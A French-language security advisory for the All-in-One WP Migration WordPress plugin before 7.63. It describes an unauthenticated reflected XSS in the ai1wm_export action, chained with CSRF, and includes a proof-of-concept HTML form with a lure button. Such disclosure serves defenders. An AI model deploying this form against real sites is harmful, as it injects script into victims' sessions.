
All-in-One WP Migration < 7.63 - XSS reflété non authentifié + CSRF
Le plugin utilise un type de contenu incorrect et n'échappe pas correctement la réponse de l'action ai1wm_export, permettant à un attaquant de créer une requête qui, lorsqu'elle est soumise par un visiteur, injectera du HTML ou du JavaScript arbitraire dans la réponse, laquelle sera exécutée dans la session de la victime.
Pour reproduire la faille, nous pouvons exporter tout le contenu du site web par le plugin et insérer un nom invalide dans le nom du fichier de sortie.
En validant la vulnérabilité, il est possible de combiner l'attaque avec un CSRF, ce qui forcera le navigateur de la victime à envoyer une requête avec la charge utile.
<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST">
<!--
Note: The secret key must be obtained through other means.
It is stored in the site option `ai1wm_secret_key`, but is
static for the lifetime of the site.
-->
<input type="hidden" name="secret_key" value="[secret_key]">
<input type="hidden" name="ai1wm_manual_export" value="1">
<input type="hidden" name="archive" value="">
<input type="submit" value="Get rich!">
</form>
All-in-One WP Migration < 7.63
Type: Cross-Site Scripting
OWASP TOP 10: A03:2021-Injection
Geovanni Campos (GeoZIN), Thiago Martins (Kirito), Jorge Buzeti (R3tr0), Leandro Inacio (Saitama), Lucas de Souza (Sinnat), Matheus Oliveira (Froyd), Filipe Baptistella (Baptistella), Leonardo Paiva (Megatron), Jose Thomaz (Pip3r), Joao Maciel (Yohan), Vinicius Pereira (Vini), , Hudson Nowak (Nowak) et Guilherme Acerbi (Ghost).